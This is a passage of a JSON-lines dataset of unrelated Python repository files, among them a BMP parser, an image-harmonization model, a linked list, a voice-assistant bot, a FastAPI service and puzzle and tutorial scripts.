BMPException(BaseException):\n pass\n\n\nerrors_en = [\n 'File Not Found!',\n 'Not a valid BMP file!',\n \"Unsupported Format!\",\n \"Compression Not Supported!\",\n]\n\nerrors_cn = [\n '找不到文件!',\n '文件无效!',\n \"格式不支持!\",\n \"暂不支持压缩。\",\n]\n\n\nclass BMP(object):\n def __init__(self, filename, lang='cn'):\n self.__filename = filename\n if lang == 'en':\n self.__errors = errors_en\n elif lang == 'cn':\n self.__errors = errors_cn\n else:\n self.__errors = errors_cn\n self.__bmpprocess(filename)\n\n def __bmpprocess(self, filename):\n try: # under upy (MicroPython) os cannot be used to check directly whether the file exists, hence the try\n with open(self.__filename, 'rb') as f:\n self.__stream = f.read()\n except:\n raise BMPException(self.__errors[0])\n\n # file header section\n self.__bfType = unpack(\" 0:\n self.__hreversed = True # height reversed (stored bottom-up)\n else:\n self.__hreversed = False # height in normal order (stored top-down)\n self.height = -self.height\n\n # self.__biPlains = unpack(\"\n self.loss_names = ['G','G_L1']\n # specify the images you want to save/display. The training/test scripts will call \n self.visual_names = ['mask', 'harmonized','comp','real']\n \n # specify the models you want to save to the disk. The training/test scripts will call and \n self.model_names = ['G'] \n self.opt.device = self.device\n self.netG = networks.define_G(opt.netG, opt.init_type, opt.init_gain, self.opt)\n \n\n if self.isTrain:\n util.saveprint(self.opt, 'netG', str(self.netG)) \n # define loss functions\n self.criterionL1 = torch.nn.L1Loss()\n self.optimizer_G = torch.optim.Adam(filter(lambda p: p.requires_grad, self.netG.parameters()), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizers.append(self.optimizer_G)\n\n \n\n def set_position(self, pos, patch_pos=None):\n b = self.opt.batch_size\n self.pixel_pos = pos.unsqueeze(0).repeat(b, 1, 1, 1).to(self.device)\n self.pixel_pos = self.pixel_pos.flatten(2).permute(2, 0, 1)\n if self.opt.pos_none:\n self.input_pos = None\n else:\n input_pos = self.PatchPositionEmbeddingSine(self.opt)\n\n self.input_pos = input_pos.unsqueeze(0).repeat(b, 1, 1, 1).to(self.device)\n\n self.input_pos = self.input_pos.flatten(2).permute(2, 0, 1)\n\n def set_input(self, input):\n \"\"\"Unpack input data from the dataloader and perform necessary pre-processing steps.\n\n Parameters:\n input (dict): include the data itself and its metadata information.\n\n The option 'direction' can be used to swap images in domain A and domain B.\n \"\"\"\n self.comp = input['comp'].to(self.device)\n self.real = input['real'].to(self.device)\n self.inputs = input['inputs'].to(self.device)\n self.mask = input['mask'].to(self.device)\n self.image_paths = input['img_path']\n\n self.revert_mask = 1-self.mask\n\n def data_dependent_initialize(self, data):\n \"\"\"\n The feature network netF is defined in terms of the shape of the intermediate, extracted\n features of the encoder portion of netG. 
Because of this, the weights of netF are\n initialized at the first feedforward pass with some input images.\n Please also see PatchSampleF.create_mlp(), which is called at the first forward() call.\n \"\"\"\n pass\n \n\n def forward(self):\n \"\"\"Run forward pass; called by both functions and .\"\"\"\n self.output = self.netG(inputs = self.inputs, pixel_pos=self.input_pos)\n # self.harmonized = self.output\n self.attention_add_h = self.output[:,0,:,:].unsqueeze(1)\n self.attention_add_l = self.output[:,1,:,:].unsqueeze(1)\n self.attention_add_s = self.output[:,2,:,:].unsqueeze(1)\n\n self.attention_mul_h = self.output[:,3,:,:].unsqueeze(1)\n self.attention_mul_l = self.output[:,4,:,:].unsqueeze(1)\n self.attention_mul_s = self.output[:,5,:,:].unsqueeze(1)\n\n h, l, s = self.comp.split(1, dim = 1)\n h = h*self.attention_mul_h + (self.attention_add_h) \n l = l*self.attention_mul_l + (self.attention_add_l)\n s = s*self.attention_mul_s + (self.attention_add_s)\n h = torch.clamp(h, 0, 1)\n l = torch.clamp(l, 0, 1)\n s = torch.clamp(s, 0, 1)\n\n self.harmonized = torch.cat([h, l, s], dim = 1)\n \n\n if not self.isTrain:\n self.harmonized = self.comp*self.revert_mask + self.harmonized*self.mask\n else: \n img_scale = [255,255,255]\n img_mean = [0, 0, 0]\n img_std = [1, 1, 1] \n tmp_real = ((self.real.permute(0,2,3,1)[0,:,:,:].cpu().numpy()*img_std+img_mean)*img_scale).astype(\"uint8\") \n tmp_real = cv2.cvtColor(tmp_real, cv2.COLOR_LAB2BGR).astype(\"uint8\") \n tmp_comp = ((self.comp.permute(0,2,3,1)[0,:,:,:].cpu().numpy()*img_std+img_mean)*img_scale).astype(\"uint8\") \n tmp_comp = cv2.cvtColor(tmp_comp, cv2.COLOR_LAB2BGR).astype(\"uint8\") \n tmp_harm = ((self.harmonized.permute(0,2,3,1)[0,:,:,:].detach().cpu().numpy()*img_std+img_mean)*img_scale).astype(\"uint8\") \n tmp_harm = cv2.cvtColor(tmp_harm, cv2.COLOR_LAB2BGR).astype(\"uint8\") \n \n tmp_mask = self.mask.permute(0,2,3,1)[0,:,:,:].detach().cpu().numpy().repeat(3,axis=2) * 255 \n tmp_h = torch.abs(self.attention_add_h).permute(0,2,3,1)[0,:,:,:].detach().cpu().numpy().repeat(3,axis=2) * 255 \n tmp_l = torch.abs(self.attention_add_l).permute(0,2,3,1)[0,:,:,:].detach().cpu().numpy().repeat(3,axis=2) * 255 \n tmp_s = torch.abs(self.attention_add_s).permute(0,2,3,1)[0,:,:,:].detach().cpu().numpy().repeat(3,axis=2) * 255 \n \n\n tmp_img = np.concatenate([tmp_real, tmp_comp, tmp_harm, tmp_mask, tmp_h, tmp_l, tmp_s],1) \n cv2.imwrite('./img.png', tmp_img)\n def compute_G_loss(self):\n \"\"\"Calculate L1 loss for the generator\"\"\"\n self.loss_G_L1 = self.criterionL1(self.harmonized, self.real)*self.opt.lambda_L1\n \n self.loss_G = self.loss_G_L1\n return self.loss_G\n\n def optimize_parameters(self):\n # forward\n self.forward()\n\n # update G\n self.optimizer_G.zero_grad()\n self.loss_G = self.compute_G_loss()\n self.loss_G.backward()\n self.optimizer_G.step()\n\n def PatchPositionEmbeddingSine(self, opt):\n temperature=10000\n if opt.stride == 1:\n feature_h = int(256/opt.ksize)\n else:\n feature_h = int((256-opt.ksize)/opt.stride)+1\n\n # feature_h = int(256/opt.ksize)*2\n num_pos_feats = 256//2\n mask = torch.ones((feature_h, feature_h))\n y_embed = mask.cumsum(0, dtype=torch.float32)\n x_embed = mask.cumsum(1, dtype=torch.float32)\n # if self.normalize:\n # eps = 1e-6\n # y_embed = y_embed / (y_embed[:, -1:, :] + eps) * self.scale\n # x_embed = x_embed / (x_embed[:, :, -1:] + eps) * self.scale\n\n dim_t = torch.arange(num_pos_feats, dtype=torch.float32)\n dim_t = temperature ** (2 * (dim_t // 2) / num_pos_feats)\n\n pos_x = x_embed[:, 
:, None] / dim_t\n pos_y = y_embed[:, :, None] / dim_t\n pos_x = torch.stack((pos_x[:, :, 0::2].sin(), pos_x[:, :, 1::2].cos()), dim=3).flatten(2)\n pos_y = torch.stack((pos_y[:, :, 0::2].sin(), pos_y[:, :, 1::2].cos()), dim=3).flatten(2)\n pos = torch.cat((pos_y, pos_x), dim=2).permute(2, 0, 1)\n return pos\n","repo_name":"XuqianRen/Semantic-guided-Multi-mask-Image-Harmonization","sub_path":"HarmonyTransformer/models/ht_model.py","file_name":"ht_model.py","file_ext":"py","file_size_in_byte":7563,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"27"} +{"seq_id":"73494948872","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 22 18:20:08 2020\r\n\r\n@author: mahesh\r\n\"\"\"\r\n\r\n\r\nclass Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n\r\n\r\nclass Single_linked_list:\r\n def __init__(self):\r\n self.head = None\r\n\r\n\r\n def push(self, data):\r\n new_node = Node(data)\r\n if self.head == None:\r\n self.head = new_node\r\n else:\r\n cur_node = self.head\r\n new_node.next = cur_node\r\n self.head = new_node\r\n cur_node = None\r\n\r\n\r\n def insert(self, prev_node, data):\r\n insert_status = False\r\n if self.head != None:\r\n new_node = Node(data)\r\n cur_node = self.head\r\n count = self.count()\r\n while count != 0:\r\n if cur_node.data == prev_node:\r\n if count == 1:\r\n cur_node.next = new_node\r\n else:\r\n new_node.next = cur_node.next\r\n cur_node.next = new_node\r\n\r\n insert_status = True\r\n break\r\n\r\n cur_node = cur_node.next\r\n count -= 1\r\n\r\n return insert_status\r\n\r\n\r\n def delete(self, key):\r\n del_status = False\r\n if self.head != None:\r\n cur_node = self.head\r\n if cur_node.data == key:\r\n self.head = cur_node.next\r\n cur_node = None\r\n del_status = True\r\n else:\r\n while True:\r\n prev_node = cur_node\r\n cur_node = cur_node.next\r\n if cur_node.data == key:\r\n if cur_node.next is None:\r\n prev_node.next = None\r\n cur_node = None\r\n else:\r\n prev_node.next = cur_node.next\r\n cur_node = None\r\n\r\n del_status = True \r\n break\r\n\r\n return del_status\r\n\r\n\r\n def display(self):\r\n if self.head is not None:\r\n ll = []\r\n cur_node = self.head\r\n ll.append(cur_node.data)\r\n while cur_node.next != None:\r\n cur_node = cur_node.next\r\n ll.append(cur_node.data)\r\n \r\n print(ll)\r\n else:\r\n print('[List is empty]')\r\n\r\n\r\n def count(self):\r\n ll_len = 0\r\n cur_node = self.head\r\n while cur_node != None:\r\n ll_len += 1\r\n cur_node = cur_node.next\r\n\r\n return ll_len\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sll = Single_linked_list()\r\n while True:\r\n choice = int(input('''1. Add element(s) to list\r\n2. Insert element after\r\n3. Delete\r\n4. Count\r\n5. 
Exit\r\nEnter your choice: '''))\r\n\r\n if choice == 1:\r\n print('\\n----------------------------------------')\r\n arr_len = int(input('How many element(s) do you want to add: '))\r\n arr = []\r\n for i in range(arr_len):\r\n e = input(f'Enter element {i}: ')\r\n arr.append(e)\r\n\r\n for e in arr:\r\n sll.push(e)\r\n\r\n print('Element(s) have been added to the list.')\r\n sll.display()\r\n print('----------------------------------------\\n')\r\n elif choice == 2:\r\n print('\\n----------------------------------------')\r\n if sll.count() > 0:\r\n sll.display()\r\n data = input('Enter data to be inserted: ')\r\n prev_node = input('After element: ')\r\n data_inserted = sll.insert(prev_node, data)\r\n if data_inserted:\r\n print('Data has been added.')\r\n sll.display()\r\n else:\r\n print(f'Element {prev_node} is not in the list. Try again!')\r\n else:\r\n print('List is empty, try again after adding some data.')\r\n\r\n print('----------------------------------------\\n')\r\n elif choice == 3:\r\n print('\\n----------------------------------------')\r\n if sll.count() > 0:\r\n sll.display()\r\n data = input('Data to be deleted: ')\r\n data_deleted = sll.delete(data)\r\n if data_deleted:\r\n print(\"Data has been deleted.\")\r\n sll.display()\r\n else:\r\n print(f'Element {data} is not in the list. Try again.')\r\n else:\r\n print('List is empty, try again after adding some data first.')\r\n\r\n print('----------------------------------------\\n')\r\n elif choice == 4:\r\n print('\\n----------------------------------------')\r\n count = sll.count()\r\n print(f'Total no of elements in list: {count}')\r\n print('----------------------------------------\\n')\r\n elif choice == 5:\r\n break\r\n else:\r\n print('\\nWrong choice. Try again.\\n')","repo_name":"maheshgawande/linked-list-data-structure","sub_path":"singly_linked_list.py","file_name":"singly_linked_list.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} {"seq_id":"9539692873","text":"import pygame\nimport math\nimport numpy as np\n\n\nclass Grid(object):\n def __init__(self, pos: tuple[int, int], row_column: list[int], cell_size: tuple[int, int], cell_color: tuple[int, int, int], border_color: tuple[int, int, int], border_size: int, screen: pygame.Surface):\n self.row_column = row_column\n self.cell_size = cell_size\n self.cell_color = cell_color\n self.border_color = border_color\n self.border_size = border_size\n self.pos = pos\n self.x_positions = []\n self.y_positions = []\n self.all_positions = []\n self.cells = []\n self.screen = screen\n self.ships = {}\n self.hits = {}\n self.locked_ships = {}\n self.returned_value = None\n self.was_clicked = False\n\n border_width = self.cell_size[0] * self.row_column[0] + \\\n (self.row_column[0] + 1) * self.border_size\n border_height = self.cell_size[1] * self.row_column[1] + \\\n (self.row_column[1] + 1) * self.border_size\n\n self.border = pygame.Rect(\n (self.pos), (border_width, border_height))\n\n for i in range(self.row_column[1]):\n self.cells.append([])\n pos_y = self.pos[1] + self.cell_size[1] * i + \\\n self.border_size * i + self.border_size\n if pos_y not in self.y_positions:\n self.y_positions.append(pos_y)\n\n for j in range(self.row_column[0]):\n pos_x = self.pos[0] + self.cell_size[0] * j + \\\n self.border_size * j + self.border_size\n if pos_x not in self.x_positions:\n self.x_positions.append(pos_x)\n self.cells[i].append(pygame.Rect(\n (pos_x, pos_y), self.cell_size))\n\n for y in 
range(self.row_column[1]):\n self.all_positions.append([])\n for x in range(self.row_column[0]):\n self.all_positions[y].append(\n (self.x_positions[x], self.y_positions[y]))\n\n def remove_from_grid(self, ship_num):\n self.locked_ships.pop(str(ship_num))\n\n def find_closest_cell(self, pos: tuple[int, int]) -> tuple[int, int]:\n if pos == (0, 0):\n return pos\n closest_candidates = []\n coords_list = []\n\n for x in self.x_positions:\n for y in self.y_positions:\n closest_candidates.append(\n math.sqrt(abs((pos[0] - x) ** 2) + abs(pos[1] - y) ** 2)) # this is distance between mouse position and currently selected coord)\n coords_list.append([x, y])\n\n temp = np.array(closest_candidates)\n closest_candidates.sort()\n temp = np.where(temp == closest_candidates[0])[0]\n closest_index = temp[0]\n\n # THIS is the coordinates of the coordinate that is closest to the mouse\n closest_index = coords_list[closest_index]\n\n return tuple(closest_index)\n\n def real_round(self, number: float) -> int:\n \"\"\"\n scuffed rounding\n \"\"\"\n\n if number == int(number):\n return int(number)\n # print(\"checking the number:\", number, \"->\", str(number/10)[3])\n if int(str(number/10)[3]) < 6:\n return int(number)\n else:\n return int(number) + 1\n\n def draw(self):\n pygame.draw.rect(self.screen, self.border_color, self.border)\n for y in self.cells:\n for x in y:\n pygame.draw.rect(self.screen, self.cell_color, x)\n\n def __del__(self):\n pass\n","repo_name":"ricsirogi/maze-creator","sub_path":"Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43072799883","text":"import extractfeature\nimport loaddata\nimport trainmodel\nimport testmodel\nimport time\nimport numpy as np\n\nif __name__ == '__main__':\n t0 = time.time()\n train_path = r\"F:\\Practice\\new\\ds2018\"\n test_path = r\"F:\\Practice\\new\\test1\"\n print(\"start loaddata\")\n train_list = loaddata.loaddata(train_path)\n print(\"train_list\")\n test_list = loaddata.loaddata(test_path)\n print(\"test_list\")\n train_feature = extractfeature.extractfeature(train_list)\n print(\"train_feature\")\n test_feature = extractfeature.extractfeature(test_list)\n print(\"test_feature\")\n print(test_feature)\n print(type(test_feature))\n # print(np.array(test_feature).shape)\n # trainmodel.trainmodel(train_feature)\n # print(\"train finished\")\n # #testmodel.testmodel(input_img=test_feature,top=2)\n # print('--------------------top5')\n # testmodel.testmodel(input_img=test_feature,top=5)\n # print('--------------------top5')\n print(time.time()-t0)\n","repo_name":"clevergirl123/practice_ML","sub_path":"NO1/something_new/mainp.py","file_name":"mainp.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28067866904","text":"# You are given a 0-indexed 2D integer array peaks where peaks[i] = [xi, yi] states that mountain i has a peak at coordinates (xi, yi). A mountain can be described as a right-angled isosceles triangle, with its base along the x-axis and a right angle at its peak. 
More formally, the gradients of ascending and descending the mountain are 1 and -1 respectively.\n# A mountain is considered visible if its peak does not lie within another mountain (including the border of other mountains).\n# Return the number of visible mountains.\n\n# Example 1:\n# Input: peaks = [[2,2],[6,3],[5,4]]\n# Output: 2\n# Explanation: The diagram above shows the mountains.\n# - Mountain 0 is visible since its peak does not lie within another mountain or its sides.\n# - Mountain 1 is not visible since its peak lies within the side of mountain 2.\n# - Mountain 2 is visible since its peak does not lie within another mountain or its sides.\n# There are 2 mountains that are visible.\n\n# Example 2:\n# Input: peaks = [[1,3],[1,3]]\n# Output: 0\n# Explanation: The diagram above shows the mountains (they completely overlap).\n# Both mountains are not visible since their peaks lie within each other.\n\n# class Solution:\n# does not work for [[2,2],[2,2],[3,1]]\n# def visibleMountains(self, peaks: List[List[int]]) -> int:\n# count = Counter((x,y) for x,y in peaks)\n# peaks = sorted([k for k, v in count.items() if v==1])\n# stack = []\n\n# def isHidden(peak1, peak2):\n# x1, y1 = peak1\n# x2, y2 = peak2\n# return x2-y2<=x1-y1 and x1+y1<=x2+y2\n\n\n# for i, peak in enumerate(peaks):\n# while stack and isHidden(peaks[stack[-1]], peak):\n# stack.pop()\n# if stack and isHidden(peak, peaks[stack[-1]]):\n# continue\n# stack.append(i)\n\n# return len(stack)\n\nfrom math import inf\nfrom typing import List\n\n\nclass Solution:\n # Time: O(nlogn), Space: O(n)\n def visibleMountains(self, peaks: List[List[int]]) -> int:\n stack = [-inf]\n curMax = 0\n for x, y in sorted(peaks):\n # find triangle x boundaries\n pos, neg = x-y, x+y\n\n # remove previous mountain that got overlapped\n while stack[-1] >= pos:\n stack.pop()\n\n # will not get overlapped by previous mountain\n if neg > curMax:\n curMax = neg\n stack.append(pos)\n return len(stack) - 1\n","repo_name":"Shifat11420/LeetcodeSolutions","sub_path":"neetcode/extraLeetcodeProblems/GoogleIQ/p2345-FindingTheNumberofVisibleMountains.py","file_name":"p2345-FindingTheNumberofVisibleMountains.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} {"seq_id":"22294048119","text":"import os\nimport time\nfrom roesifier import process_new_file\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\n\nclass OnMyWatch:\n\n def __init__(self):\n self.observer = Observer()\n # Set the directory on watch\n self.watch_directory = \"/ftphome/tranfer_files\"\n Handler.watch_directory = self.watch_directory\n\n def run(self):\n # define FTP path to scan all files before watchdog client\n dir_list = os.listdir(self.watch_directory)\n # scans all files in FTP dir and runs the main func before watchdog client\n for file in dir_list:\n process_new_file(file, self.watch_directory)\n\n #Handler.__class__.watch_directory = self.watch_directory\n event_handler = Handler()\n self.observer.schedule(event_handler, self.watch_directory, recursive=True)\n self.observer.start()\n try:\n while True:\n time.sleep(5)\n except Exception as error:\n self.observer.stop()\n\n self.observer.join()\n\n\nclass Handler(FileSystemEventHandler):\n watch_directory = \"\"\n @staticmethod\n # actions when an Event (file) is closed:\n def on_closed(event, **kwargs):\n Handler()\n if event.is_directory:\n return None\n # create variable with the name of the file\n file_name = 
event.src_path.replace(Handler.watch_directory, '')\n process_new_file(file_name, Handler.watch_directory)\n\n\nif __name__ == '__main__':\n watch = OnMyWatch()\n watch.run()\n","repo_name":"Rsagiv/final","sub_path":"ftp_server/watchdog_classes.py","file_name":"watchdog_classes.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} {"seq_id":"25428608279","text":"\nimport pyttsx3 # pip install pyttsx3\nimport datetime\nimport speech_recognition as sr # pip install SpeechRecognition\nimport sys\nimport wikipedia # pip install wikipedia\nimport webbrowser as wb\nimport os\nimport psutil # pip install psutil\nimport pyjokes # pip install pyjokes\n\nengine=pyttsx3.init()\n\ndef speak(audio):\n engine.say(audio)\n engine.runAndWait()\n \n# Function to tell time\ndef time():\n time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n speak(\"The current time is\")\n speak(time)\n \n# Function to tell date\ndef date():\n year = int(datetime.datetime.now().year)\n month = int(datetime.datetime.now().month)\n date = int(datetime.datetime.now().day)\n speak(\"The current date is\")\n speak(date)\n speak(month)\n speak(year)\n \n# Function for greeting\ndef wishme():\n speak(\"Welcome back sir\")\n time()\n date()\n hour = datetime.datetime.now().hour\n if hour >=6 and hour<12:\n speak(\"Good Morning sir\")\n elif hour>=12 and hour<18:\n speak(\"Good Afternoon sir\")\n elif hour >=18 and hour<24:\n speak(\"Good Evening sir\")\n else:\n speak(\"Good Night Sir\")\n speak(\"Alexa at your service. Please tell me how can i help you\")\n\n# Function to take your commands\ndef takeCommand():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening...\")\n r.pause_threshold=1\n audio = r.listen(source)\n try:\n print(\"Recognizing..\")\n query = r.recognize_google(audio, language=\"en-in\")\n print(query)\n except Exception as e:\n print(e)\n speak(\"Say that again please...\")\n return \"None\"\n return query\n\n# Function for Cpu and Battery usage\ndef cpu():\n usage = str(psutil.cpu_percent())\n speak(\"cpu is at\"+ usage)\n battery = psutil.sensors_battery()\n speak(\"Battery is at\")\n speak(battery.percent )\n\n# Function for jokes\ndef jokes():\n joke = pyjokes.get_joke()\n print(joke)\n speak(joke)\n \n# Main function\nif __name__ == \"__main__\":\n wishme()\n while True:\n query = takeCommand().lower()\n \n if 'time' in query:\n time()\n \n elif 'date' in query:\n date()\n \n elif 'wikipedia' in query:\n speak(\"Searching...\")\n query = query.replace(\"wikipedia\",\"\")\n result = wikipedia.summary(query,sentences=2)\n print(result)\n speak(result)\n \n elif 'search in chrome' in query:\n speak(\"What should i search ?\")\n chromepath = \"C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s\"\n search = takeCommand().lower()\n wb.get(chromepath).open_new_tab(search+'.com')\n \n elif 'logout' in query: # Logout function\n os.system(\"Shutdown -l\")\n \n elif 'remember that' in query:\n speak(\"what should i remember?\")\n data = takeCommand()\n speak(\"you said me to remember that\"+data)\n remember = open('data.txt','w') # First create an empty data.txt file\n remember.write(data)\n remember.close()\n \n elif 'do you remember anything' in query:\n remember = open('data.txt','r')\n speak(\"you said to remember that\" +remember.read())\n \n elif 'cpu' in query:\n cpu()\n \n elif 'joke' in query:\n jokes()\n \n elif 'offline' in query: # Function to terminate the program\n sys.exit()\n 
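        # A sketch of an alternative dispatch for the keyword/elif chain above:
        # a hypothetical helper (not part of the original assistant) that maps
        # query keywords to the handler functions already defined in this file.
        #
        #     def dispatch(query):
        #         handlers = {'time': time, 'date': date, 'cpu': cpu, 'joke': jokes}
        #         for keyword, handler in handlers.items():
        #             if keyword in query:
        #                 handler()
        #                 return True
        #         return False  # let the remaining elif branches handle the rest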
\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"NayakNaveen/AI_Bot","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"3708596018","text":"import jwt\n\nfrom typing import Optional\nfrom fastapi import Depends, HTTPException\nfrom fastapi.security import HTTPBearer\nfrom fastapi_sqlalchemy import db\nfrom pydantic import ValidationError\nfrom starlette import status\n\nfrom app.models.model_user_prt import UserPrt\nfrom app.core.config import settings\nfrom app.core.security import verify_password, get_password_hash\nfrom app.schemas.sche_token import TokenPayload\nfrom app.schemas.sche_user_prt import UserPrtCreateRequest, UserPrtUpdateRequest \n\n\n\nclass UserPrtService(object):\n __instance = None\n\n reusable_oauth2 = HTTPBearer(\n scheme_name='Authorization'\n )\n\n @staticmethod\n def create_user(data: UserPrtCreateRequest):\n new_user = UserPrt(\n company=data.company,\n email=data.email,\n address=data.address,\n phone=data.phone,\n mobile=data.mobile,\n tax_num=data.tax_num,\n bank_acc=data.bank_acc,\n ptype=data.ptype,\n )\n db.session.add(new_user)\n db.session.commit()\n return new_user\n\n @staticmethod\n def update(user: UserPrt, data: UserPrtUpdateRequest):\n print(f'data: {data.__dict__}')\n user.company = user.company if data.company is None else data.company\n user.email = user.email if data.email is None else data.email\n user.address = user.address if data.address is None else data.address\n user.phone = user.phone if data.phone is None else data.phone\n user.mobile = user.mobile if data.mobile is None else data.mobile\n user.tax_num = user.tax_num if data.tax_num is None else data.tax_num\n user.bank_acc = user.bank_acc if data.bank_acc is None else data.bank_acc\n user.ptype = user.ptype if data.ptype is None else data.ptype\n db.session.commit()\n return user\n","repo_name":"tara-ava/UberCompSubmission_Cli-Mate","sub_path":"backend/FastAPI-project-template/app/services/srv_user_prt.py","file_name":"srv_user_prt.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23527375555","text":"# -*- coding: utf-8 -*-\n\nimport csv\n\ndef readCSV(iteration):\n ids = []\n vectors = []\n labels = []\n with open('resultTRAIN{}.csv'.format(iteration), 'rU') as data:\n reader = csv.reader(data)\n count = 0\n for row in reader:\n if count != 0:\n ids.append(row[0])\n s = row[1].replace('[','').replace(']','').split(', ')\n tmp = [float(i) for i in s]\n vectors.append(tmp)\n labels.append(float(row[2]))\n count = 42\n return ids, vectors, labels\n\ndef readTestCSV(iteration):\n test_ids = []\n test_vectors = []\n test_labels = []\n with open('resultTEST{}.csv'.format(iteration), 'rU') as data:\n reader = csv.reader(data)\n count = 0\n for row in reader:\n if count != 0:\n test_ids.append(row[0])\n s = row[1].replace('[','').replace(']','').split(', ')\n tmp = [float(i) for i in s]\n test_vectors.append(tmp)\n test_labels.append(float(row[2]))\n count = 42\n return test_ids, test_vectors, test_labels","repo_name":"thorbenwiese/ML","sub_path":"Assignment11/dataAdapter.py","file_name":"dataAdapter.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4308552198","text":"# coding=utf-8\n# Date: 2021/7/14 10:19\nfrom typing import 
List\n\n\n# 执行用时:860 ms, 在所有 Python3 提交中击败了35.67%的用户\n# 内存消耗:26.9 MB, 在所有 Python3 提交中击败了69.94%的用户\nclass Solution:\n def minAbsoluteSumDiff(self, nums1: List[int], nums2: List[int]) -> int:\n mod = int(1e9) + 7\n n = len(nums1)\n a = nums1.copy()\n a.sort()\n sum, d = 0, 0\n for i in range(n):\n t = abs(nums1[i] - nums2[i])\n sum = (sum + t) % mod\n l, r = 0, n\n while l < r:\n mid = l + r >> 1\n if a[mid] >= nums2[i]:\n r = mid\n else:\n l = mid + 1\n if r < n:\n d = max(d, t - abs(a[r] - nums2[i]))\n if r > 0:\n d = max(d, t - abs(a[r - 1] - nums2[i]))\n return (sum - d + mod) % mod\n\n\nif __name__ == \"__main__\":\n print(Solution().minAbsoluteSumDiff([1, 28, 21], [9, 21, 20])) # 9\n","repo_name":"ToLoveToFeel/LeetCode","sub_path":"Python/_1818_Minimum_Absolute_Sum_Difference/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"15078809167","text":"from tqdm import trange\nfrom typing import (\n Iterable,\n Mapping,\n Sequence,\n Set,\n Tuple,\n )\n\n\n\ndef play_a_round(\n next_cups: Sequence[int],\n current_cup: int,\n ) -> int:\n \"\"\"\n array where arr[cup] = next_cup\n \"\"\"\n NUM_CARDS = len(next_cups) - 1\n\n # The crab picks up the three cups that are immediately clockwise of\n # the current cup. They are removed from the circle; cup spacing is\n # adjusted as necessary to maintain the circle.\n trio1 = next_cups[current_cup]\n trio2 = next_cups[trio1]\n trio3 = next_cups[trio2]\n next_cups[current_cup] = next_cups[trio3]\n\n # The crab selects a destination cup: the cup with a label equal to the\n # current cup's label minus one. If this would select one of the cups\n # that was just picked up, the crab will keep subtracting one until it\n # finds a cup that wasn't just picked up. If at any point in this\n # process the value goes below the lowest value on any cup's label, it\n # wraps around to the highest value on any cup's label instead.\n destination_cup = current_cup - 1\n exclusion = set((trio1, trio2, trio3))\n while destination_cup in exclusion or destination_cup < 1:\n destination_cup -= 1\n if destination_cup < 1:\n destination_cup = NUM_CARDS\n #print('destination:', destination_cup)\n\n # The crab places the cups it just picked up so that they are\n # immediately clockwise of the destination cup. 
They keep the same\n # order as when they were picked up.\n next_cups[trio3] = next_cups[destination_cup]\n next_cups[destination_cup] = trio1\n\n # The crab selects a new current cup: the cup which is immediately\n # clockwise of the current cup.\n # NOTE: data has changed and so will the current index thus we find it again.\n current_cup = next_cups[current_cup]\n\n return current_cup\n\n\n\ndef play_game(data: Tuple[int], num_rounds: int = 100):\n \"\"\"\n Play the game using an array where arr[cup] = next_cup\n \"\"\"\n current_cup = data[0]\n next_cups = [None] * (len(data) + 1)\n for c, n in zip(data, data[1:]):\n next_cups[c] = n\n next_cups[data[-1]] = data[0]\n assert len(set(next_cups)) == len(next_cups)\n\n for move in trange(num_rounds):\n current_cup = play_a_round(next_cups, current_cup)\n\n return next_cups\n","repo_name":"SamuelLarkin/AdventOfCode2020","sub_path":"23 - Crab Cups/game_with_array_of_next_cup.py","file_name":"game_with_array_of_next_cup.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} {"seq_id":"4656600436","text":"# Calculations\nvar = (25 * 15 + 33) / 2.0\nprint (var)\n# Strings\nstring = 'I am a basic string'\nprint (string)\n# Replacing\nword = \"Ford\"\nword = 'L' +word[1:]\nprint(word)\n# Length of the strings\nvar2 = len('My length is enormous')\nprint ('The length of the statement is {y}'.format(y = var2))\n# Escape characters\nprint ('I\\'m a string in \"Python\" ')\nprint (r'c:\\system\\nan')\nprint (\"\"\"\\\n Hello:\n It is user defined output with triple quotes\n \"\"\")\n# Booleans (TRUE and FALSE)\nprint (5 < 6)\nprint (10 > 15)\nprint (2 >= 5)\nprint (4 != 2)\nprint (\"abc\" == \"abc\")\na = True\nb = False\nprint (not a)\n\n# If statement\npasserby_speech = 'Hiho'\nif passerby_speech == 'Hi' or passerby_speech == 'Hello':\n print (\"Hello, how are you doing?\")\nelif passerby_speech == 'Hey':\n print (\"Hi\")\nelse:\n print (\"I don't know you!\")\n\nif 5 < 7 :\n if 6 > 4:\n print (\"6 > 4\")\nnum = 6\nif num > 3 and num 